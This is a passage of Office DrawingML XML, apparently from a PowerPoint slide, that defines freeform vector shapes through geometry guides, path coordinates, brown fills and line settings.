                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 227"/>
                        <a:gd name="T1" fmla="*/ 47 h 62"/>
                        <a:gd name="T2" fmla="*/ 177 w 227"/>
                        <a:gd name="T3" fmla="*/ 0 h 62"/>
                        <a:gd name="T4" fmla="*/ 227 w 227"/>
                        <a:gd name="T5" fmla="*/ 12 h 62"/>
                        <a:gd name="T6" fmla="*/ 47 w 227"/>
                        <a:gd name="T7" fmla="*/ 62 h 62"/>
                        <a:gd name="T8" fmla="*/ 0 w 227"/>
                        <a:gd name="T9" fmla="*/ 47 h 6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27" h="62">
                          <a:moveTo>
                            <a:pt x="0" y="47"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="177" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="227" y="12"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="47" y="62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rgbClr val="663300"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="6633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49" name="Freeform 113">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22F87F36-25B8-4E06-A738-6FCB40B16BE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2434" y="1651"/>
                      <a:ext cx="101" cy="115"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 180"/>
                        <a:gd name="T1" fmla="*/ 206 h 206"/>
                        <a:gd name="T2" fmla="*/ 0 w 180"/>
                        <a:gd name="T3" fmla="*/ 50 h 206"/>
                        <a:gd name="T4" fmla="*/ 180 w 180"/>
                        <a:gd name="T5" fmla="*/ 0 h 206"/>
                        <a:gd name="T6" fmla="*/ 180 w 180"/>
                        <a:gd name="T7" fmla="*/ 158 h 206"/>
                        <a:gd name="T8" fmla="*/ 0 w 180"/>
                        <a:gd name="T9" fmla="*/ 206 h 20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80" h="206">
                          <a:moveTo>
                            <a:pt x="0" y="206"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="50"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="180" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="180" y="158"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="206"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="8E4700"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="6633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50" name="Freeform 114">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A64DF709-4071-420A-99AA-6A109CC47A7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2408" y="1671"/>
                      <a:ext cx="26" cy="95"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 47"/>
                        <a:gd name="T1" fmla="*/ 0 h 171"/>
                        <a:gd name="T2" fmla="*/ 0 w 47"/>
                        <a:gd name="T3" fmla="*/ 159 h 171"/>
                        <a:gd name="T4" fmla="*/ 47 w 47"/>
                        <a:gd name="T5" fmla="*/ 171 h 171"/>
                        <a:gd name="T6" fmla="*/ 47 w 47"/>
                        <a:gd name="T7" fmla="*/ 15 h 171"/>
                        <a:gd name="T8" fmla="*/ 0 w 47"/>
                        <a:gd name="T9" fmla="*/ 0 h 17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7" h="171">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="159"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="47" y="171"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="47" y="1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482400"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="6633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51" name="Freeform 115">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44BA63EF-9816-4A7F-A423-304CCE38323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2487" y="1632"/>
                      <a:ext cx="11" cy="26"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 19"/>
                        <a:gd name="T1" fmla="*/ 0 h 47"/>
                        <a:gd name="T2" fmla="*/ 0 w 19"/>
                        <a:gd name="T3" fmla="*/ 42 h 47"/>
                        <a:gd name="T4" fmla="*/ 19 w 19"/>
                        <a:gd name="T5" fmla="*/ 47 h 47"/>
                        <a:gd name="T6" fmla="*/ 19 w 19"/>
                        <a:gd name="T7" fmla="*/ 4 h 47"/>
                        <a:gd name="T8" fmla="*/ 0 w 19"/>
                        <a:gd name="T9" fmla="*/ 0 h 4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" h="47">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="42"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="19" y="47"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="19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8E4700"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="6633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52" name="Freeform 116">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7B8AA1F-E7BE-4A02-B9D1-EE84E97A048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2446" y="1632"/>
                      <a:ext cx="58" cy="40"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 104 w 104"/>
                        <a:gd name="T1" fmla="*/ 0 h 73"/>
                        <a:gd name="T2" fmla="*/ 0 w 104"/>
                        <a:gd name="T3" fmla="*/ 28 h 73"/>
                        <a:gd name="T4" fmla="*/ 0 w 104"/>
                        <a:gd name="T5" fmla="*/ 73 h 73"/>
                        <a:gd name="T6" fmla="*/ 14 w 104"/>
                        <a:gd name="T7" fmla="*/ 68 h 73"/>
                        <a:gd name="T8" fmla="*/ 14 w 104"/>
                        <a:gd name="T9" fmla="*/ 37 h 73"/>
                        <a:gd name="T10" fmla="*/ 92 w 104"/>
                        <a:gd name="T11" fmla="*/ 16 h 73"/>
                        <a:gd name="T12" fmla="*/ 92 w 104"/>
                        <a:gd name="T13" fmla="*/ 47 h 73"/>
                        <a:gd name="T14" fmla="*/ 104 w 104"/>
                        <a:gd name="T15" fmla="*/ 45 h 73"/>
                        <a:gd name="T16" fmla="*/ 104 w 104"/>
                        <a:gd name="T17" fmla="*/ 0 h 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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="104" h="73">
                          <a:moveTo>
                            <a:pt x="104" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="28"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="73"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="14" y="68"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="14" y="37"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="92" y="16"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="92" y="47"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="104" y="45"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="104" y="0"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="8E4700"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="6633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53" name="Freeform 117">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{010796E8-19D2-4170-A7A0-46587F4A161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2437" y="1645"/>
                      <a:ext cx="9" cy="27"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 16"/>
                        <a:gd name="T1" fmla="*/ 0 h 50"/>
                        <a:gd name="T2" fmla="*/ 0 w 16"/>
                        <a:gd name="T3" fmla="*/ 43 h 50"/>
                        <a:gd name="T4" fmla="*/ 16 w 16"/>
                        <a:gd name="T5" fmla="*/ 50 h 50"/>
                        <a:gd name="T6" fmla="*/ 16 w 16"/>
                        <a:gd name="T7" fmla="*/ 5 h 50"/>
                        <a:gd name="T8" fmla="*/ 0 w 16"/>
                        <a:gd name="T9" fmla="*/ 0 h 5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50">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="43"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="16" y="50"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="16" y="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8E4700"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="6633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54" name="Freeform 118">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B073E3C2-EAF5-496E-906D-C1B41A8D888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2437" y="1629"/>
                      <a:ext cx="67" cy="18"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 120"/>
                        <a:gd name="T1" fmla="*/ 28 h 33"/>
                        <a:gd name="T2" fmla="*/ 101 w 120"/>
                        <a:gd name="T3" fmla="*/ 0 h 33"/>
                        <a:gd name="T4" fmla="*/ 120 w 120"/>
                        <a:gd name="T5" fmla="*/ 5 h 33"/>
                        <a:gd name="T6" fmla="*/ 16 w 120"/>
                        <a:gd name="T7" fmla="*/ 33 h 33"/>
                        <a:gd name="T8" fmla="*/ 0 w 120"/>
                        <a:gd name="T9" fmla="*/ 28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0" h="33">
                          <a:moveTo>
                            <a:pt x="0" y="28"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="101" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="120" y="5"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="16" y="33"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="28"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="8E4700"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="6633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947" name="Freeform 119">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFB8BA75-AF8F-44CC-9F99-32DE32218F2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057" y="2672"/>
                    <a:ext cx="32" cy="153"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 55"/>
                      <a:gd name="T1" fmla="*/ 0 h 265"/>
                      <a:gd name="T2" fmla="*/ 14 w 55"/>
                      <a:gd name="T3" fmla="*/ 22 h 265"/>
                      <a:gd name="T4" fmla="*/ 5 w 55"/>
                      <a:gd name="T5" fmla="*/ 239 h 265"/>
                      <a:gd name="T6" fmla="*/ 29 w 55"/>
                      <a:gd name="T7" fmla="*/ 265 h 265"/>
                      <a:gd name="T8" fmla="*/ 52 w 55"/>
                      <a:gd name="T9" fmla="*/ 253 h 265"/>
                      <a:gd name="T10" fmla="*/ 38 w 55"/>
                      <a:gd name="T11" fmla="*/ 29 h 265"/>
                      <a:gd name="T12" fmla="*/ 55 w 55"/>
                      <a:gd name="T13" fmla="*/ 15 h 265"/>
                      <a:gd name="T14" fmla="*/ 0 w 55"/>
                      <a:gd name="T15" fmla="*/ 0 h 2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5" h="265">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="14" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="5" y="239"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="29" y="265"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="52" y="253"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="38" y="29"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="55" y="1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40505"/>
                  </a:solidFill>
                  <a:ln w="6350" cap="flat">
                    <a:solidFill>
                      <a:schemeClr val="bg1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40" name="Group 120">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25094E44-A4E4-49A1-836C-639A9BA039BD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658" y="2536"/>
                  <a:ext cx="326" cy="637"/>
                  <a:chOff x="3960" y="782"/>
                  <a:chExt cx="326" cy="637"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1941" name="Freeform 121">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E546680-3DD1-4B4C-9DBA-83400D21628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4028" y="1088"/>
                    <a:ext cx="121" cy="331"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 89 w 90"/>
                      <a:gd name="T1" fmla="*/ 156 h 245"/>
                      <a:gd name="T2" fmla="*/ 90 w 90"/>
                      <a:gd name="T3" fmla="*/ 7 h 245"/>
                      <a:gd name="T4" fmla="*/ 90 w 90"/>
                      <a:gd name="T5" fmla="*/ 5 h 245"/>
                      <a:gd name="T6" fmla="*/ 63 w 90"/>
                      <a:gd name="T7" fmla="*/ 20 h 245"/>
                      <a:gd name="T8" fmla="*/ 12 w 90"/>
                      <a:gd name="T9" fmla="*/ 11 h 245"/>
                      <a:gd name="T10" fmla="*/ 3 w 90"/>
                      <a:gd name="T11" fmla="*/ 0 h 245"/>
                      <a:gd name="T12" fmla="*/ 3 w 90"/>
                      <a:gd name="T13" fmla="*/ 36 h 245"/>
                      <a:gd name="T14" fmla="*/ 2 w 90"/>
                      <a:gd name="T15" fmla="*/ 205 h 245"/>
                      <a:gd name="T16" fmla="*/ 44 w 90"/>
                      <a:gd name="T17" fmla="*/ 205 h 245"/>
                      <a:gd name="T18" fmla="*/ 45 w 90"/>
                      <a:gd name="T19" fmla="*/ 51 h 245"/>
                      <a:gd name="T20" fmla="*/ 36 w 90"/>
                      <a:gd name="T21" fmla="*/ 40 h 245"/>
                      <a:gd name="T22" fmla="*/ 45 w 90"/>
                      <a:gd name="T23" fmla="*/ 51 h 245"/>
                      <a:gd name="T24" fmla="*/ 44 w 90"/>
                      <a:gd name="T25" fmla="*/ 205 h 245"/>
                      <a:gd name="T26" fmla="*/ 44 w 90"/>
                      <a:gd name="T27" fmla="*/ 211 h 245"/>
                      <a:gd name="T28" fmla="*/ 89 w 90"/>
                      <a:gd name="T29" fmla="*/ 218 h 245"/>
                      <a:gd name="T30" fmla="*/ 89 w 90"/>
                      <a:gd name="T31" fmla="*/ 156 h 2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90" h="245">
                        <a:moveTo>
                          <a:pt x="89" y="156"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="89" y="141"/>
                          <a:pt x="90" y="47"/>
                          <a:pt x="90" y="7"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="90" y="6"/>
                          <a:pt x="90" y="6"/>
                          <a:pt x="90" y="5"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="87" y="16"/>
                          <a:pt x="71" y="22"/>
                          <a:pt x="63" y="20"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="55" y="20"/>
                          <a:pt x="24" y="13"/>
                          <a:pt x="12" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6" y="10"/>
                          <a:pt x="4" y="5"/>
                          <a:pt x="3" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="18"/>
                          <a:pt x="3" y="32"/>
                          <a:pt x="3" y="36"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="49"/>
                          <a:pt x="0" y="181"/>
                          <a:pt x="2" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="229"/>
                          <a:pt x="44" y="225"/>
                          <a:pt x="44" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="171"/>
                          <a:pt x="46" y="55"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="45" y="47"/>
                          <a:pt x="36" y="47"/>
                          <a:pt x="36" y="40"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="36" y="47"/>
                          <a:pt x="45" y="47"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="55"/>
                          <a:pt x="43" y="171"/>
                          <a:pt x="44" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="207"/>
                          <a:pt x="44" y="211"/>
                          <a:pt x="44" y="211"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="245"/>
                          <a:pt x="87" y="235"/>
                          <a:pt x="89" y="218"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="90" y="201"/>
                          <a:pt x="89" y="171"/>
                          <a:pt x="89" y="15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50000">
                        <a:schemeClr val="bg1">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:schemeClr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2" name="Freeform 122">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{492F8D57-C9B2-465D-A3B1-E90FB0B3A8A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3960" y="866"/>
                    <a:ext cx="326" cy="257"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 201 w 241"/>
                      <a:gd name="T1" fmla="*/ 107 h 190"/>
                      <a:gd name="T2" fmla="*/ 179 w 241"/>
                      <a:gd name="T3" fmla="*/ 113 h 190"/>
                      <a:gd name="T4" fmla="*/ 169 w 241"/>
                      <a:gd name="T5" fmla="*/ 49 h 190"/>
                      <a:gd name="T6" fmla="*/ 169 w 241"/>
                      <a:gd name="T7" fmla="*/ 49 h 190"/>
                      <a:gd name="T8" fmla="*/ 143 w 241"/>
                      <a:gd name="T9" fmla="*/ 24 h 190"/>
                      <a:gd name="T10" fmla="*/ 100 w 241"/>
                      <a:gd name="T11" fmla="*/ 13 h 190"/>
                      <a:gd name="T12" fmla="*/ 60 w 241"/>
                      <a:gd name="T13" fmla="*/ 2 h 190"/>
                      <a:gd name="T14" fmla="*/ 30 w 241"/>
                      <a:gd name="T15" fmla="*/ 12 h 190"/>
                      <a:gd name="T16" fmla="*/ 4 w 241"/>
                      <a:gd name="T17" fmla="*/ 159 h 190"/>
                      <a:gd name="T18" fmla="*/ 36 w 241"/>
                      <a:gd name="T19" fmla="*/ 168 h 190"/>
                      <a:gd name="T20" fmla="*/ 54 w 241"/>
                      <a:gd name="T21" fmla="*/ 47 h 190"/>
                      <a:gd name="T22" fmla="*/ 53 w 241"/>
                      <a:gd name="T23" fmla="*/ 164 h 190"/>
                      <a:gd name="T24" fmla="*/ 62 w 241"/>
                      <a:gd name="T25" fmla="*/ 175 h 190"/>
                      <a:gd name="T26" fmla="*/ 113 w 241"/>
                      <a:gd name="T27" fmla="*/ 189 h 190"/>
                      <a:gd name="T28" fmla="*/ 140 w 241"/>
                      <a:gd name="T29" fmla="*/ 169 h 190"/>
                      <a:gd name="T30" fmla="*/ 138 w 241"/>
                      <a:gd name="T31" fmla="*/ 88 h 190"/>
                      <a:gd name="T32" fmla="*/ 137 w 241"/>
                      <a:gd name="T33" fmla="*/ 75 h 190"/>
                      <a:gd name="T34" fmla="*/ 137 w 241"/>
                      <a:gd name="T35" fmla="*/ 76 h 190"/>
                      <a:gd name="T36" fmla="*/ 138 w 241"/>
                      <a:gd name="T37" fmla="*/ 80 h 190"/>
                      <a:gd name="T38" fmla="*/ 138 w 241"/>
                      <a:gd name="T39" fmla="*/ 82 h 190"/>
                      <a:gd name="T40" fmla="*/ 138 w 241"/>
                      <a:gd name="T41" fmla="*/ 87 h 190"/>
                      <a:gd name="T42" fmla="*/ 138 w 241"/>
                      <a:gd name="T43" fmla="*/ 88 h 190"/>
                      <a:gd name="T44" fmla="*/ 138 w 241"/>
                      <a:gd name="T45" fmla="*/ 88 h 190"/>
                      <a:gd name="T46" fmla="*/ 144 w 241"/>
                      <a:gd name="T47" fmla="*/ 121 h 190"/>
                      <a:gd name="T48" fmla="*/ 144 w 241"/>
                      <a:gd name="T49" fmla="*/ 123 h 190"/>
                      <a:gd name="T50" fmla="*/ 144 w 241"/>
                      <a:gd name="T51" fmla="*/ 123 h 190"/>
                      <a:gd name="T52" fmla="*/ 144 w 241"/>
                      <a:gd name="T53" fmla="*/ 127 h 190"/>
                      <a:gd name="T54" fmla="*/ 153 w 241"/>
                      <a:gd name="T55" fmla="*/ 147 h 190"/>
                      <a:gd name="T56" fmla="*/ 167 w 241"/>
                      <a:gd name="T57" fmla="*/ 153 h 190"/>
                      <a:gd name="T58" fmla="*/ 214 w 241"/>
                      <a:gd name="T59" fmla="*/ 139 h 190"/>
                      <a:gd name="T60" fmla="*/ 201 w 241"/>
                      <a:gd name="T61" fmla="*/ 107 h 1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</a:cxnLst>
                    <a:rect l="0" t="0" r="r" b="b"/>
                    <a:pathLst>
                      <a:path w="241" h="190">
                        <a:moveTo>
                          <a:pt x="201" y="107"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="199" y="108"/>
                          <a:pt x="191" y="110"/>
                          <a:pt x="179" y="113"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="174" y="85"/>
                          <a:pt x="170" y="58"/>
                          <a:pt x="169" y="49"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="169" y="49"/>
                          <a:pt x="169" y="49"/>
                          <a:pt x="169" y="49"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="166" y="32"/>
                          <a:pt x="151" y="27"/>
                          <a:pt x="143" y="24"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="21"/>
                          <a:pt x="113" y="16"/>
                          <a:pt x="100" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="89" y="10"/>
                          <a:pt x="69" y="4"/>
                          <a:pt x="60" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="51" y="0"/>
                          <a:pt x="33" y="4"/>
                          <a:pt x="30" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="28" y="17"/>
                          <a:pt x="8" y="139"/>
                          <a:pt x="4" y="159"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="181"/>
                          <a:pt x="31" y="184"/>
                          <a:pt x="36" y="168"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="40" y="158"/>
                          <a:pt x="55" y="38"/>
                          <a:pt x="54" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="53"/>
                          <a:pt x="53" y="122"/>
                          <a:pt x="53" y="164"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="169"/>
                          <a:pt x="56" y="174"/>
                          <a:pt x="62" y="175"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="75" y="177"/>
                          <a:pt x="106" y="187"/>
                          <a:pt x="113" y="189"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="121" y="190"/>
                          <a:pt x="137" y="181"/>
                          <a:pt x="140" y="169"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="141"/>
                          <a:pt x="140" y="111"/>
                          <a:pt x="138" y="88"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="137" y="82"/>
                          <a:pt x="137" y="78"/>
                          <a:pt x="137" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="137" y="75"/>
                          <a:pt x="137" y="75"/>
                          <a:pt x="137" y="76"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="137" y="77"/>
                          <a:pt x="137" y="79"/>
                          <a:pt x="138" y="80"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="138" y="81"/>
                          <a:pt x="138" y="81"/>
                          <a:pt x="138" y="82"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="138" y="84"/>
                          <a:pt x="138" y="85"/>
                          <a:pt x="138" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="138" y="87"/>
                          <a:pt x="138" y="88"/>
                          <a:pt x="138" y="88"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="138" y="88"/>
                          <a:pt x="138" y="88"/>
                          <a:pt x="138" y="88"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="140" y="96"/>
                          <a:pt x="141" y="108"/>
                          <a:pt x="144" y="121"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="144" y="122"/>
                          <a:pt x="144" y="122"/>
                          <a:pt x="144" y="123"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="144" y="123"/>
                          <a:pt x="144" y="123"/>
                          <a:pt x="144" y="123"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="144" y="127"/>
                          <a:pt x="144" y="127"/>
                          <a:pt x="144" y="127"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="146" y="137"/>
                          <a:pt x="149" y="143"/>
                          <a:pt x="153" y="147"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="156" y="151"/>
                          <a:pt x="161" y="152"/>
                          <a:pt x="167" y="153"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="181" y="149"/>
                          <a:pt x="197" y="144"/>
                          <a:pt x="214" y="139"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="241" y="131"/>
                          <a:pt x="225" y="99"/>
                          <a:pt x="201" y="107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50000">
                        <a:schemeClr val="bg1">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:schemeClr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3" name="Freeform 123">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57F50DB1-D6C6-489D-90AA-510BC027423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4047" y="852"/>
                    <a:ext cx="89" cy="55"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 29 w 66"/>
                      <a:gd name="T1" fmla="*/ 39 h 41"/>
                      <a:gd name="T2" fmla="*/ 10 w 66"/>
                      <a:gd name="T3" fmla="*/ 22 h 41"/>
                      <a:gd name="T4" fmla="*/ 16 w 66"/>
                      <a:gd name="T5" fmla="*/ 12 h 41"/>
                      <a:gd name="T6" fmla="*/ 53 w 66"/>
                      <a:gd name="T7" fmla="*/ 16 h 41"/>
                      <a:gd name="T8" fmla="*/ 57 w 66"/>
                      <a:gd name="T9" fmla="*/ 29 h 41"/>
                      <a:gd name="T10" fmla="*/ 29 w 66"/>
                      <a:gd name="T11" fmla="*/ 39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6" h="41">
                        <a:moveTo>
                          <a:pt x="29" y="39"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="37"/>
                          <a:pt x="0" y="25"/>
                          <a:pt x="10" y="22"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="16" y="21"/>
                          <a:pt x="13" y="15"/>
                          <a:pt x="16" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="10"/>
                          <a:pt x="53" y="0"/>
                          <a:pt x="53" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="53" y="21"/>
                          <a:pt x="47" y="25"/>
                          <a:pt x="57" y="29"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="66" y="33"/>
                          <a:pt x="46" y="41"/>
                          <a:pt x="29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3175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4" name="Oval 124">
